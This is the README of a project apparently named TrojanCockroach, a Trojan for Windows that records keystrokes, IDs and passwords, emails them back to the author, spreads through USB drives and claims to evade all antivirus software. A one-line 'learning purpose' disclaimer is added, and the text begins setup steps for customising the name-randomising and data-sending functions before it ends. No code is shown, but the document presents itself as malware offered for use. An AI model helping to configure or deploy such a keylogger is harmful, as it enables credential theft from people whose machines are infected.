MinhasKamal/TrojanCockroach/README.md

 <a href="https://MinhasKamal.github.io/TrojanCockroach">This program</a> is a **Trojan Virus** that steals data (ID, password; every key stroke) from PC (Windows XP or later) and emails it back to the author.
 It spreads among PCs through USB drives.
 It is undetectable by any antivirus software.

+This project is created only for learning purpose.

 ### Setup
 1. Preparation
   1. Change **getRandomName()** and **sendData()** method of **TrojanCockroach.cpp** according to your wish.